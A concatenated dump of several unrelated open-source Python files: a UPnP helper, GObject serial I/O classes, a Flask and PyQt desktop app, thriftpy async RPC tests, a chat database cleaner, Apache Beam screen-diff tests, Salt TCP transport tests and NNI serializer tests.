self.thread.start()
def remap(self, port):
self.queue.put(("remap", port))
def release(self, port):
self.queue.put(("release", port))
def shutdown(self):
if not self.thread:
return
self.queue.put(("shutdown",))
log.info("UPnP, shutting down thread")
self.thread.join()
self.thread = None
# this is here just in case the UPnP object is destroyed non-gracefully,
# e.g. via an exception before the main thread can call shutdown()
def __del__(self):
self.shutdown()
|
io.py
|
import os
import time
import threading
from queue import Queue
from gi.repository import GObject, GLib
class BackgroundIO(GObject.GObject):
__gsignals__ = {'data-received': (GObject.SIGNAL_RUN_FIRST, None,
(object, )),
'data-sent': (GObject.SIGNAL_RUN_FIRST, None,
(object, )), }
def __init__(self, *args, **kwargs):
super(BackgroundIO, self).__init__(*args, **kwargs)
self._send_queue = Queue()
@property
def name(self):
return self.__class__.__name__
def start_daemon(self):
self._receive_thread = threading.Thread(
target=self._run_receive_thread)
self._receive_thread.daemon = True
self._send_thread = threading.Thread(target=self._run_send_thread)
self._send_thread.daemon = True
self._receive_thread.start()
self._send_thread.start()
def send_data(self, data):
self._send_queue.put(data)
def _run_receive_thread(self):
raise NotImplementedError()
def _run_send_thread(self):
raise NotImplementedError()
@classmethod
def new_and_start(cls, *args, **kwargs):
instance = cls(*args, **kwargs)
instance.start_daemon()
return instance
class RandomDataGenerator(BackgroundIO):
def __init__(self, delay, *args, **kwargs):
super(RandomDataGenerator, self).__init__(*args, **kwargs)
self.delay = delay
def _run_send_thread(self):
while True:
data = b'ABC\n\x12'
GLib.idle_add(self.emit, 'data-sent', data)
time.sleep(self.delay)
def _run_receive_thread(self):
while True:
data = os.urandom(2)
GLib.idle_add(self.emit, 'data-received', data)
time.sleep(self.delay)
class Echo(BackgroundIO):
def _run_send_thread(self):
while True:
data = self._send_queue.get()
GLib.idle_add(self.emit, 'data-sent', data)
# receive right away
GLib.idle_add(self.emit, 'data-received', data)
def _run_receive_thread(self):
pass
class SerialIO(BackgroundIO):
def __init__(self, ser, *args, **kwargs):
super(SerialIO, self).__init__(*args, **kwargs)
self.ser = ser
@property
def name(self):
return self.ser.port
def _run_send_thread(self):
while True:
data = self._send_queue.get()
idx = 0
while idx != len(data):
bytes_sent = self.ser.write(data[idx:])
idx += bytes_sent
GLib.idle_add(self.emit, 'data-sent', data)
def _run_receive_thread(self):
while True:
data = self.ser.read()
GLib.idle_add(self.emit, 'data-received', data)
|
app.py
|
from threading import Thread
import sys
from flask import Flask, render_template
from PyQt5.QtCore import *
from PyQt5.QtWidgets import *
from PyQt5.QtGui import *
from PyQt5.QtWebEngineWidgets import *
import sys
from time import sleep
webInstance = Flask(__name__)
# webInstance.config['PORT'] = 5000
@webInstance.route('/')
def index():
return render_template('index.html')
class MainWindow(QMainWindow):
def __init__(self, *args, **kwargs):
super(MainWindow,self).__init__(*args, **kwargs)
self.browser = QWebEngineView()
self.setWindowTitle("Application Title")
self.browser.setUrl(QUrl("http://127.0.0.1:5000"))
self.setCentralWidget(self.browser)
self.show()
webInstanceConfig = {'host': '127.0.0.1', 'port': 5000, 'threaded': True, 'use_reloader': False, 'debug': True}
Thread(target=webInstance.run, daemon=True, kwargs=webInstanceConfig).start()
# sleep(2)
app = QApplication(sys.argv)
window = MainWindow()
app.exec_()
|
test_aio.py
|
# -*- coding: utf-8 -*-
import os
import asyncio
# import uvloop
import threading
# asyncio.set_event_loop_policy(uvloop.EventLoopPolicy())
import time
import pytest
import thriftpy
thriftpy.install_import_hook()
from thriftpy.rpc import make_aio_server, make_aio_client # noqa
from thriftpy.transport import TTransportException # noqa
addressbook = thriftpy.load(os.path.join(os.path.dirname(__file__),
"addressbook.thrift"))
unix_sock = "/tmp/aio_thriftpy_test.sock"
SSL_PORT = 50442
class Dispatcher:
def __init__(self):
self.ab = addressbook.AddressBook()
self.ab.people = {}
@asyncio.coroutine
def ping(self):
return True
@asyncio.coroutine
def hello(self, name):
return "hello " + name
@asyncio.coroutine
def add(self, person):
self.ab.people[person.name] = person
return True
@asyncio.coroutine
def remove(self, name):
try:
self.ab.people.pop(name)
return True
except KeyError:
raise addressbook.PersonNotExistsError(
"{0} not exists".format(name))
@asyncio.coroutine
def get(self, name):
try:
return self.ab.people[name]
except KeyError:
raise addressbook.PersonNotExistsError(
"{0} not exists".format(name))
@asyncio.coroutine
def book(self):
return self.ab
@asyncio.coroutine
def get_phonenumbers(self, name, count):
p = [self.ab.people[name].phones[0]] if name in self.ab.people else []
return p * count
@asyncio.coroutine
def get_phones(self, name):
phone_numbers = self.ab.people[name].phones
return dict((p.type, p.number) for p in phone_numbers)
@asyncio.coroutine
def sleep(self, ms):
yield from asyncio.sleep(ms / 1000.0)
return True
@pytest.fixture(scope="module")
def aio_server(request):
loop = asyncio.new_event_loop()
server = make_aio_server(
addressbook.AddressBookService,
Dispatcher(),
unix_socket=unix_sock,
loop=loop
)
st = threading.Thread(target=server.serve)
st.daemon = True
st.start()
time.sleep(0.1)
@pytest.fixture(scope="module")
def aio_ssl_server(request):
loop = asyncio.new_event_loop()
ssl_server = make_aio_server(
addressbook.AddressBookService, Dispatcher(),
host='localhost', port=SSL_PORT,
certfile="ssl/server.pem", keyfile="ssl/server.key", loop=loop
)
st = threading.Thread(target=ssl_server.serve)
st.daemon = True
st.start()
time.sleep(0.1)
@pytest.fixture(scope="module")
def person():
phone1 = addressbook.PhoneNumber()
phone1.type = addressbook.PhoneType.MOBILE
phone1.number = '555-1212'
phone2 = addressbook.PhoneNumber()
phone2.type = addressbook.PhoneType.HOME
phone2.number = '555-1234'
# empty struct
phone3 = addressbook.PhoneNumber()
alice = addressbook.Person()
alice.name = "Alice"
alice.phones = [phone1, phone2, phone3]
alice.created_at = int(time.time())
return alice
async def client(timeout=3000):
return await make_aio_client(
addressbook.AddressBookService,
unix_socket=unix_sock, socket_timeout=timeout
)
async def ssl_client(timeout=3000):
return await make_aio_client(
addressbook.AddressBookService,
host='localhost', port=SSL_PORT,
socket_timeout=timeout,
cafile="ssl/CA.pem", certfile="ssl/client.crt",
keyfile="ssl/client.key")
@pytest.mark.asyncio
async def test_void_api(aio_server):
c = await client()
assert await c.ping() is None
c.close()
@pytest.mark.asyncio
async def test_void_api_with_ssl(aio_ssl_server):
c = await ssl_client()
assert await c.ping() is None
c.close()
@pytest.mark.asyncio
async def test_string_api(aio_server):
c = await client()
assert await c.hello("world") == "hello world"
c.close()
@pytest.mark.asyncio
async def test_string_api_with_ssl(aio_ssl_server):
c = await client()
assert await c.hello("world") == "hello world"
c.close()
@pytest.mark.asyncio
async def test_huge_res(aio_server):
c = await client()
big_str = "world" * 100000
assert await c.hello(big_str) == "hello " + big_str
c.close()
@pytest.mark.asyncio
async def test_huge_res_with_ssl(aio_ssl_server):
c = await ssl_client()
big_str = "world" * 100000
assert await c.hello(big_str) == "hello " + big_str
c.close()
@pytest.mark.asyncio
async def test_tstruct_req(person):
c = await client()
assert await c.add(person) is True
c.close()
@pytest.mark.asyncio
async def test_tstruct_req_with_ssl(person):
c = await ssl_client()
assert await c.add(person) is True
c.close()
@pytest.mark.asyncio
async def test_tstruct_res(person):
c = await client()
assert person == await c.get("Alice")
c.close()
@pytest.mark.asyncio
async def test_tstruct_res_with_ssl(person):
c = await ssl_client()
assert person == await c.get("Alice")
c.close()
@pytest.mark.asyncio
async def test_complex_tstruct():
c = await client()
assert len(await c.get_phonenumbers("Alice", 0)) == 0
assert len(await c.get_phonenumbers("Alice", 1000)) == 1000
c.close()
@pytest.mark.asyncio
async def test_complex_tstruct_with_ssl():
c = await ssl_client()
assert len(await c.get_phonenumbers("Alice", 0)) == 0
assert len(await c.get_phonenumbers("Alice", 1000)) == 1000
c.close()
@pytest.mark.asyncio
async def test_exception():
with pytest.raises(addressbook.PersonNotExistsError):
c = await client()
await c.remove("Bob")
@pytest.mark.asyncio
async def test_exception_iwth_ssl():
with pytest.raises(addressbook.PersonNotExistsError):
c = await ssl_client()
await c.remove("Bob")
@pytest.mark.asyncio
async def test_client_socket_timeout():
with pytest.raises(asyncio.TimeoutError):
try:
c = await ssl_client(timeout=500)
await c.sleep(1000)
except:
c.close()
raise
@pytest.mark.asyncio
async def test_ssl_socket_timeout():
# SSL socket timeout raises socket.timeout since Python 3.2.
# http://bugs.python.org/issue10272
with pytest.raises(asyncio.TimeoutError):
try:
c = await ssl_client(timeout=500)
await c.sleep(1000)
except:
c.close()
raise
@pytest.mark.asyncio
async def test_client_connect_timeout():
with pytest.raises(TTransportException):
c = await make_aio_client(
addressbook.AddressBookService,
unix_socket='/tmp/test.sock',
connect_timeout=1000
)
await c.hello('test')
|
cleanup_db.py
|
__author__ = 'anushabala'
import sqlite3
import time
import atexit
import json
from argparse import ArgumentParser
from cocoa.core.systems.human_system import HumanSystem
import multiprocessing
class DBCleaner():
SLEEP_TIME = 15
def __init__(self, db_file, chat_timeout, user_timeout):
self.db_file = db_file
self.chat_timeout = chat_timeout
self.user_timeout = user_timeout
self.cleaned_chats = set()
self._stop = False
@staticmethod
def cleanup(db_file, chat_timeout, user_timeout, cleaned_chats, sleep_time, q):
def _cleanup_corrupt_counts():
# this should never happen!
cursor.execute('''UPDATE scenario SET active=0 WHERE active < 0''')
def _update_inactive_chats(chats):
for chat_info in chats:
chat_id, sid, outcome, _, agent_types, start_time = chat_info
if chat_id not in cleaned_chats:
# if it's been longer than chat_timeout seconds since the chat started, and the chat
# wasn't previously cleaned up, update the scenario DB
agent_types = json.loads(agent_types)
partner_type = agent_types['0'] if agent_types['1'] == HumanSystem.name() else agent_types['1']
print "[Cleaner] Cleaned up chat with ID={}, partner_type={}, scenario_id={}".format(
chat_id, partner_type, sid
)
cursor.execute('''
UPDATE scenario SET active=active-1 WHERE partner_type=? AND scenario_id=?
''', (partner_type, sid))
cleaned_chats.add(chat_id)
def _find_incomplete_chats():
# print 'Finding timed out chats with no outcome'
cursor.execute('''SELECT * FROM chat WHERE outcome="" AND start_time <?''', (now-chat_timeout,))
# Select all incomplete chats (with empty outcomes) that have timed out
return cursor.fetchall()
def _is_connection_timed_out(userid):
cursor.execute('''SELECT connected_status, connected_timestamp FROM active_user WHERE name=?''', (userid,))
status, tmstp = cursor.fetchone()
if status == 0 and tmstp < now - user_timeout:
return True
return False
def _find_disconnected_user_chats():
"""
Find chats with no outcome where at least one human agent has been disconnected longer
than user_timeout seconds
:return:
"""
# print 'Finding chats with no outcome and users with timed out connections'
cursor.execute('''SELECT * FROM chat WHERE outcome=""''')
inc_chats = cursor.fetchall()
disconnected_chats = []
for chat_info in inc_chats:
chat_id, sid, outcome, agent_ids, agent_types, start_time = chat_info
agent_types = json.loads(agent_types)
agent_ids = json.loads(agent_ids)
human_idxes = [k for k in agent_types.keys() if agent_types[k] == HumanSystem.name()]
clean = False
for idx in human_idxes:
userid = agent_ids[idx]
if _is_connection_timed_out(userid):
# print "User %s connection timeout" % userid
clean = True
if clean:
disconnected_chats.append(chat_info)
return disconnected_chats
try:
conn = sqlite3.connect(db_file)
with conn:
cursor = conn.cursor()
now = time.time()
filters = [_find_incomplete_chats, _find_disconnected_user_chats]
for f in filters:
chats = f()
_update_inactive_chats(chats)
_cleanup_corrupt_counts()
q.put(cleaned_chats)
# print "[Cleaner] Sleeping for %d seconds" % sleep_time
time.sleep(sleep_time)
except sqlite3.IntegrityError:
print("WARNING: Rolled back transaction")
except KeyboardInterrupt:
if q.empty():
q.put(cleaned_chats)
def cancel(self):
print "[Cleaner] Stopping execution"
self._stop = True
def stopped(self):
return self._stop
def start(self):
print "[Cleaner] Starting execution"
while not self.stopped():
q = multiprocessing.Queue()
p = multiprocessing.Process(target=self.cleanup, args=(self.db_file, self.chat_timeout, self.user_timeout, self.cleaned_chats, self.SLEEP_TIME, q))
try:
p.start()
p.join()
self.cleaned_chats = q.get()
# print "[Cleaner] Awoke from sleep"
# print "[Cleaner] Cleaned chats from queue:", self.cleaned_chats
except KeyboardInterrupt:
# If program is killed, try to run cleanup one last time in case past run was interrupted
p.join()
self.cancel()
if not q.empty():
# print "[Cleaner] Got item from queue from killed process"
self.cleaned_chats = q.get()
# print self.cleaned_chats
p = multiprocessing.Process(target=self.cleanup, args=(self.db_file, self.chat_timeout, self.user_timeout, self.cleaned_chats, 0, q))
p.start()
p.join()
print "[Cleaner] Stopped execution"
def stop_cleanup(handler):
handler.cancel()
if __name__ == "__main__":
parser = ArgumentParser()
parser.add_argument('--config', help='Path to config file for website')
parser.add_argument('--db-file', help='Path to DB file to cleanup')
args = parser.parse_args()
params = json.load(open(args.config, 'r'))
cleanup_handler = DBCleaner(args.db_file,
chat_timeout=params['status_params']['chat']['num_seconds'] + 30,
user_timeout=params['connection_timeout_num_seconds'] + 5)
# atexit.register(stop_cleanup, handler=cleanup_handler)
cleanup_handler.start()
|
screen_diff.py
|
#
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""Module to conduct screen diff based notebook integration tests."""
# pytype: skip-file
import os
import platform
import threading
import unittest
from http.server import HTTPServer
from http.server import SimpleHTTPRequestHandler
import pytest
from apache_beam.runners.interactive import interactive_environment as ie
from apache_beam.runners.interactive.testing.integration import notebook_executor
try:
import chromedriver_binary # pylint: disable=unused-import
from needle.cases import NeedleTestCase
from needle.driver import NeedleChrome
from selenium.webdriver.chrome.options import Options
from selenium.webdriver.common.by import By
from selenium.webdriver.support import expected_conditions
from selenium.webdriver.support.ui import WebDriverWait
_interactive_integration_ready = (
notebook_executor._interactive_integration_ready)
except ImportError:
_interactive_integration_ready = False
# Web elements will be rendered differently on different platforms. List all
# supported platforms with goldens here.
_SUPPORTED_PLATFORMS = ['Darwin', 'Linux']
class ScreenDiffIntegrationTestEnvironment(object):
"""A test environment to conduct screen diff integration tests for notebooks.
"""
def __init__(self, test_notebook_path, golden_dir, cleanup=True):
# type: (str, str, bool) -> None
assert _interactive_integration_ready, (
'[interactive_test] dependency is not installed.')
assert os.path.exists(golden_dir), '{} does not exist.'.format(golden_dir)
assert os.path.isdir(golden_dir), '{} is not a directory.'.format(
golden_dir)
self._golden_dir = golden_dir
self._notebook_executor = notebook_executor.NotebookExecutor(
test_notebook_path)
self._cleanup = cleanup
self._test_urls = {}
self._server = None
def __enter__(self):
self._notebook_executor.execute()
self._server = HTTPServer(('', 0), SimpleHTTPRequestHandler)
def start_serving(server):
server.serve_forever()
threading.Thread(
target=start_serving, args=[self._server], daemon=True).start()
for test_id, output_path in\
self._notebook_executor.output_html_paths.items():
self._test_urls[test_id] = self.base_url + output_path
return self
def __exit__(self, exc_type, exc_value, traceback):
if self._notebook_executor and self._cleanup:
self._notebook_executor.cleanup()
if self._server:
def stop_serving(server):
server.shutdown()
threading.Thread(
target=stop_serving, args=[self._server], daemon=True).start()
@property
def base_url(self):
"""The base url where the locally started server serving HTMLs generated by
notebook executions."""
assert self._server, 'Server has not started.'
host_n_port = self._server.server_address
return 'http://{}:{}/'.format(host_n_port[0], host_n_port[1])
@property
def test_urls(self):
"""Mapping from test_id/execution_id to urls serving the output HTML pages
generated by the corresponding notebook executions."""
return self._test_urls
@property
def notebook_path_to_test_id(self):
"""Mapping from input notebook paths to their obfuscated execution/test ids.
"""
return self._notebook_executor.notebook_path_to_execution_id
def should_skip():
"""Whether a screen diff test should be skipped."""
return not (
platform.system() in _SUPPORTED_PLATFORMS and
ie.current_env().is_interactive_ready and _interactive_integration_ready)
if should_skip():
@unittest.skip(
reason='[interactive] and [interactive_test] deps are both required.')
@pytest.mark.skip(
reason='[interactive] and [interactive_test] deps are both required.')
class BaseTestCase(unittest.TestCase):
"""A skipped base test case if interactive_test dependency is not installed.
"""
pass
else:
class BaseTestCase(NeedleTestCase):
"""A base test case to execute screen diff integration tests."""
# Whether the browser should be headless.
_headless = True
def __init__(self, *args, **kwargs):
"""Initializes a test.
Some kwargs that could be configured:
#. golden_dir=<path>. A directory path pointing to all the golden
screenshots as baselines for comparison.
#. test_notebook_dir=<path>. A path pointing to a directory of
notebook files in ipynb format.
#. headless=<True/False>. Whether the browser should be headless when
executing the tests.
#. golden_size=<(int, int)>. The size of the screenshot to take and
compare.
#. cleanup=<True/False>. Whether to clean up the output directory.
Should always be True in automated test environment. When debugging,
turn it False to manually check the output for difference.
#. threshold=<float>. An image difference threshold, when the image
pixel distance is bigger than the value, the test will fail.
"""
golden_root = kwargs.pop(
'golden_dir',
'apache_beam/runners/interactive/testing/integration/goldens')
self._golden_dir = os.path.join(golden_root, platform.system())
self._test_notebook_dir = kwargs.pop(
'test_notebook_dir',
'apache_beam/runners/interactive/testing/integration/test_notebooks')
BaseTestCase._headless = kwargs.pop('headless', True)
self._test_env = None
self._viewport_width, self._viewport_height = kwargs.pop(
'golden_size', (1024, 10000))
self._cleanup = kwargs.pop('cleanup', True)
self._threshold = kwargs.pop('threshold', 5000)
self.baseline_directory = os.path.join(os.getcwd(), self._golden_dir)
self.output_directory = os.path.join(
os.getcwd(), self._test_notebook_dir, 'output')
super().__init__(*args, **kwargs)
@classmethod
def get_web_driver(cls):
chrome_options = Options()
if cls._headless:
chrome_options.add_argument('--headless')
chrome_options.add_argument('--no-sandbox')
chrome_options.add_argument('--disable-dev-shm-usage')
chrome_options.add_argument('--force-color-profile=srgb')
return NeedleChrome(options=chrome_options)
def setUp(self):
self.set_viewport_size(self._viewport_width, self._viewport_height)
def run(self, result=None):
with ScreenDiffIntegrationTestEnvironment(self._test_notebook_dir,
self._golden_dir,
self._cleanup) as test_env:
self._test_env = test_env
super().run(result)
def explicit_wait(self):
"""Wait for common elements to be visible."""
WebDriverWait(self.driver, 5).until(
expected_conditions.visibility_of_element_located(
(By.TAG_NAME, 'facets-overview')))
WebDriverWait(self.driver, 5).until(
expected_conditions.visibility_of_element_located(
(By.TAG_NAME, 'facets-dive')))
def assert_all(self):
"""Asserts screenshots for all notebooks in the test_notebook_path."""
for test_id, test_url in self._test_env.test_urls.items():
self.driver.get(test_url)
self.explicit_wait()
self.assertScreenshot('body', test_id, self._threshold)
def assert_single(self, test_id):
"""Asserts the screenshot for a single test. The given test id will be the
name of the golden screenshot."""
test_url = self._test_env.test_urls.get(test_id, None)
assert test_url, '{} is not a valid test id.'.format(test_id)
self.driver.get(test_url)
self.explicit_wait()
self.assertScreenshot('body', test_id, self._threshold)
def assert_notebook(self, notebook_name):
"""Asserts the screenshot for a single notebook. The notebook with the
given notebook_name under test_notebook_dir will be executed and asserted.
"""
if not notebook_name.endswith('.ipynb'):
notebook_name += '.ipynb'
notebook_path = os.path.join(self._test_notebook_dir, notebook_name)
test_id = self._test_env.notebook_path_to_test_id.get(notebook_path, None)
assert test_id, 'Cannot find notebook with name {}.'.format(notebook_name)
self.assert_single(test_id)
# This file contains no tests. Below lines are purely for passing lint.
if __name__ == '__main__':
unittest.main()
|
tcp_test.py
|
# -*- coding: utf-8 -*-
'''
:codeauthor: :email:`Thomas Jackson <jacksontj.89@gmail.com>`
'''
# Import python libs
from __future__ import absolute_import
import os
import threading
import tornado.gen
import tornado.ioloop
from tornado.testing import AsyncTestCase
import salt.config
import salt.utils
import salt.transport.server
import salt.transport.client
import salt.exceptions
# Import Salt Testing libs
from salttesting import TestCase, skipIf
from salttesting.helpers import ensure_in_syspath
ensure_in_syspath('../')
import integration
# Import Salt libs
from unit.transport.req_test import ReqChannelMixin
from unit.transport.pub_test import PubChannelMixin
# TODO: move to a library?
def get_config_file_path(filename):
return os.path.join(integration.TMP, 'config', filename)
class BaseTCPReqCase(TestCase):
'''
Test the req server/client pair
'''
@classmethod
def setUpClass(cls):
cls.master_opts = salt.config.master_config(get_config_file_path('master'))
cls.master_opts.update({
'transport': 'tcp',
'auto_accept': True,
})
cls.minion_opts = salt.config.minion_config(get_config_file_path('minion'))
cls.minion_opts.update({
'transport': 'tcp',
'master_uri': 'tcp://127.0.0.1:{0}'.format(cls.minion_opts['master_port']),
})
cls.process_manager = salt.utils.process.ProcessManager(name='ReqServer_ProcessManager')
cls.server_channel = salt.transport.server.ReqServerChannel.factory(cls.master_opts)
cls.server_channel.pre_fork(cls.process_manager)
cls.io_loop = tornado.ioloop.IOLoop()
cls.io_loop.make_current()
cls.server_channel.post_fork(cls._handle_payload, io_loop=cls.io_loop)
cls.server_thread = threading.Thread(target=cls.io_loop.start)
cls.server_thread.daemon = True
cls.server_thread.start()
@classmethod
def tearDownClass(cls):
cls.io_loop.stop()
cls.server_thread.join()
cls.process_manager.kill_children()
cls.server_channel.close()
del cls.server_channel
class ClearReqTestCases(BaseTCPReqCase, ReqChannelMixin):
'''
Test all of the clear msg stuff
'''
def setUp(self):
self.channel = salt.transport.client.ReqChannel.factory(self.minion_opts, crypt='clear')
@classmethod
@tornado.gen.coroutine
def _handle_payload(cls, payload):
'''
TODO: something besides echo
'''
raise tornado.gen.Return((payload, {'fun': 'send_clear'}))
class AESReqTestCases(BaseTCPReqCase, ReqChannelMixin):
def setUp(self):
self.channel = salt.transport.client.ReqChannel.factory(self.minion_opts)
@classmethod
@tornado.gen.coroutine
def _handle_payload(cls, payload):
'''
TODO: something besides echo
'''
raise tornado.gen.Return((payload, {'fun': 'send'}))
# TODO: make failed returns have a specific framing so we can raise the same exception
# on encrypted channels
def test_badload(self):
'''
Test a variety of bad requests, make sure that we get some sort of error
'''
msgs = ['', [], tuple()]
for msg in msgs:
with self.assertRaises(salt.exceptions.AuthenticationError):
ret = self.channel.send(msg)
class BaseTCPPubCase(AsyncTestCase):
'''
Test the req server/client pair
'''
@classmethod
def setUpClass(cls):
cls.master_opts = salt.config.master_config(get_config_file_path('master'))
cls.master_opts.update({
'transport': 'tcp',
'auto_accept': True,
})
cls.minion_opts = salt.config.minion_config(get_config_file_path('minion'))
cls.minion_opts.update({
'transport': 'tcp',
'master_ip': '127.0.0.1',
'auth_timeout': 1,
'master_uri': 'tcp://127.0.0.1:{0}'.format(cls.minion_opts['master_port']),
})
cls.process_manager = salt.utils.process.ProcessManager(name='ReqServer_ProcessManager')
cls.server_channel = salt.transport.server.PubServerChannel.factory(cls.master_opts)
cls.server_channel.pre_fork(cls.process_manager)
# we also require req server for auth
cls.req_server_channel = salt.transport.server.ReqServerChannel.factory(cls.master_opts)
cls.req_server_channel.pre_fork(cls.process_manager)
cls._server_io_loop = tornado.ioloop.IOLoop()
cls.req_server_channel.post_fork(cls._handle_payload, io_loop=cls._server_io_loop)
cls.server_thread = threading.Thread(target=cls._server_io_loop.start)
cls.server_thread.start()
@classmethod
def _handle_payload(cls, payload):
'''
TODO: something besides echo
'''
return payload, {'fun': 'send_clear'}
@classmethod
def tearDownClass(cls):
cls._server_io_loop.stop()
cls.server_thread.join()
cls.process_manager.kill_children()
cls.req_server_channel.close()
del cls.req_server_channel
def setUp(self):
super(BaseTCPPubCase, self).setUp()
self._start_handlers = dict(self.io_loop._handlers)
def tearDown(self):
super(BaseTCPPubCase, self).tearDown()
failures = []
for k, v in self.io_loop._handlers.iteritems():
if self._start_handlers.get(k) != v:
failures.append((k, v))
if len(failures) > 0:
raise Exception('FDs still attached to the IOLoop: {0}'.format(failures))
@skipIf(True, 'Skip until we can devote time to fix this test')
class AsyncPubChannelTest(BaseTCPPubCase, PubChannelMixin):
'''
Tests around the publish system
'''
if __name__ == '__main__':
from integration import run_tests
run_tests(ClearReqTestCases, needs_daemon=False)
run_tests(AESReqTestCases, needs_daemon=False)
|
test_serializer.py
|
from collections import OrderedDict
import math
import os
import pickle
import subprocess
import sys
from pathlib import Path
import pytest
import nni
import torch
import torch.nn as nn
from torch.utils.data import DataLoader
from torchvision import transforms
from torchvision.datasets import MNIST
from nni.common.serializer import is_traceable
if True: # prevent auto formatting
sys.path.insert(0, Path(__file__).parent.as_posix())
from imported.model import ImportTest
# this test cannot be directly put in this file. It will cause syntax error for python <= 3.7.
if tuple(sys.version_info) >= (3, 8):
from imported._test_serializer_py38 import test_positional_only
def test_ordered_json():
items = [
('a', 1),
('c', 3),
('b', 2),
]
orig = OrderedDict(items)
json = nni.dump(orig)
loaded = nni.load(json)
assert list(loaded.items()) == items
@nni.trace
class SimpleClass:
def __init__(self, a, b=1):
self._a = a
self._b = b
@nni.trace
class EmptyClass:
pass
class UnserializableSimpleClass:
def __init__(self):
self._a = 1
def test_simple_class():
instance = SimpleClass(1, 2)
assert instance._a == 1
assert instance._b == 2
dump_str = nni.dump(instance)
assert '"__kwargs__": {"a": 1, "b": 2}' in dump_str
assert '"__symbol__"' in dump_str
instance = nni.load(dump_str)
assert instance._a == 1
assert instance._b == 2
def test_external_class():
from collections import OrderedDict
d = nni.trace(kw_only=False)(OrderedDict)([('a', 1), ('b', 2)])
assert d['a'] == 1
assert d['b'] == 2
dump_str = nni.dump(d)
assert dump_str == '{"a": 1, "b": 2}'
conv = nni.trace(torch.nn.Conv2d)(3, 16, 3)
assert conv.in_channels == 3
assert conv.out_channels == 16
assert conv.kernel_size == (3, 3)
assert nni.dump(conv) == \
r'{"__symbol__": "path:torch.nn.modules.conv.Conv2d", ' \
r'"__kwargs__": {"in_channels": 3, "out_channels": 16, "kernel_size": 3}}'
conv = nni.load(nni.dump(conv))
assert conv.kernel_size == (3, 3)
def test_nested_class():
a = SimpleClass(1, 2)
b = SimpleClass(a)
assert b._a._a == 1
dump_str = nni.dump(b)
b = nni.load(dump_str)
assert 'SimpleClass object at' in repr(b)
assert b._a._a == 1
def test_unserializable():
a = UnserializableSimpleClass()
dump_str = nni.dump(a)
a = nni.load(dump_str)
assert a._a == 1
def test_function():
t = nni.trace(math.sqrt, kw_only=False)(3)
assert 1 < t < 2
assert t.trace_symbol == math.sqrt
assert t.trace_args == [3]
t = nni.load(nni.dump(t))
assert 1 < t < 2
assert not is_traceable(t) # trace not recovered, expected, limitation
def simple_class_factory(bb=3.):
return SimpleClass(1, bb)
t = nni.trace(simple_class_factory)(4)
ts = nni.dump(t)
assert '__kwargs__' in ts
t = nni.load(ts)
assert t._a == 1
assert is_traceable(t)
t = t.trace_copy()
assert is_traceable(t)
assert t.trace_symbol(10)._b == 10
assert t.trace_kwargs['bb'] == 4
assert is_traceable(t.trace_copy())
class Foo:
def __init__(self, a, b=1):
self.aa = a
self.bb = [b + 1 for _ in range(1000)]
def __eq__(self, other):
return self.aa == other.aa and self.bb == other.bb
def test_custom_class():
module = nni.trace(Foo)(3)
assert nni.load(nni.dump(module)) == module
module = nni.trace(Foo)(b=2, a=1)
assert nni.load(nni.dump(module)) == module
module = nni.trace(Foo)(Foo(1), 5)
dumped_module = nni.dump(module)
module = nni.load(dumped_module)
assert module.bb[0] == module.bb[999] == 6
module = nni.trace(Foo)(nni.trace(Foo)(1), 5)
dumped_module = nni.dump(module)
assert nni.load(dumped_module) == module
class Foo:
def __init__(self, a, b=1):
self.aa = a
self.bb = [b + 1 for _ in range(1000)]
def __eq__(self, other):
return self.aa == other.aa and self.bb == other.bb
def test_basic_unit_and_custom_import():
module = ImportTest(3, 0.5)
ss = nni.dump(module)
assert ss == r'{"__symbol__": "path:imported.model.ImportTest", "__kwargs__": {"foo": 3, "bar": 0.5}}'
assert nni.load(nni.dump(module)) == module
import nni.retiarii.nn.pytorch as nn
module = nn.Conv2d(3, 10, 3, bias=False)
ss = nni.dump(module)
assert ss == r'{"__symbol__": "path:torch.nn.modules.conv.Conv2d", "__kwargs__": {"in_channels": 3, "out_channels": 10, "kernel_size": 3, "bias": false}}'
assert nni.load(ss).bias is None
def test_dataset():
dataset = nni.trace(MNIST)(root='data/mnist', train=False, download=True)
dataloader = nni.trace(DataLoader)(dataset, batch_size=10)
dumped_ans = {
"__symbol__": "path:torch.utils.data.dataloader.DataLoader",
"__kwargs__": {
"dataset": {
"__symbol__": "path:torchvision.datasets.mnist.MNIST",
"__kwargs__": {"root": "data/mnist", "train": False, "download": True}
},
"batch_size": 10
}
}
print(nni.dump(dataloader))
print(nni.dump(dumped_ans))
assert nni.dump(dataloader) == nni.dump(dumped_ans)
dataloader = nni.load(nni.dump(dumped_ans))
assert isinstance(dataloader, DataLoader)
dataset = nni.trace(MNIST)(root='data/mnist', train=False, download=True,
transform=nni.trace(transforms.Compose)([
nni.trace(transforms.ToTensor)(),
nni.trace(transforms.Normalize)((0.1307,), (0.3081,))
]))
dataloader = nni.trace(DataLoader)(dataset, batch_size=10)
x, y = next(iter(nni.load(nni.dump(dataloader))))
assert x.size() == torch.Size([10, 1, 28, 28])
assert y.size() == torch.Size([10])
dataset = nni.trace(MNIST)(root='data/mnist', train=False, download=True,
transform=nni.trace(transforms.Compose)(
[transforms.ToTensor(), transforms.Normalize((0.1307,), (0.3081,))]
))
dataloader = nni.trace(DataLoader)(dataset, batch_size=10)
x, y = next(iter(nni.load(nni.dump(dataloader))))
assert x.size() == torch.Size([10, 1, 28, 28])
assert y.size() == torch.Size([10])
def test_pickle():
pickle.dumps(EmptyClass())
obj = SimpleClass(1)
obj = pickle.loads(pickle.dumps(obj))
assert obj._a == 1
assert obj._b == 1
obj = SimpleClass(1)
obj.xxx = 3
obj = pickle.loads(pickle.dumps(obj))
assert obj.xxx == 3
@pytest.mark.skipif(sys.platform != 'linux', reason='https://github.com/microsoft/nni/issues/4434')
def test_multiprocessing_dataloader():
# check whether multi-processing works
# it's possible to have pickle errors
dataset = nni.trace(MNIST)(root='data/mnist', train=False, download=True,
transform=nni.trace(transforms.Compose)(
[transforms.ToTensor(), transforms.Normalize((0.1307,), (0.3081,))]
))
import nni.retiarii.evaluator.pytorch.lightning as pl
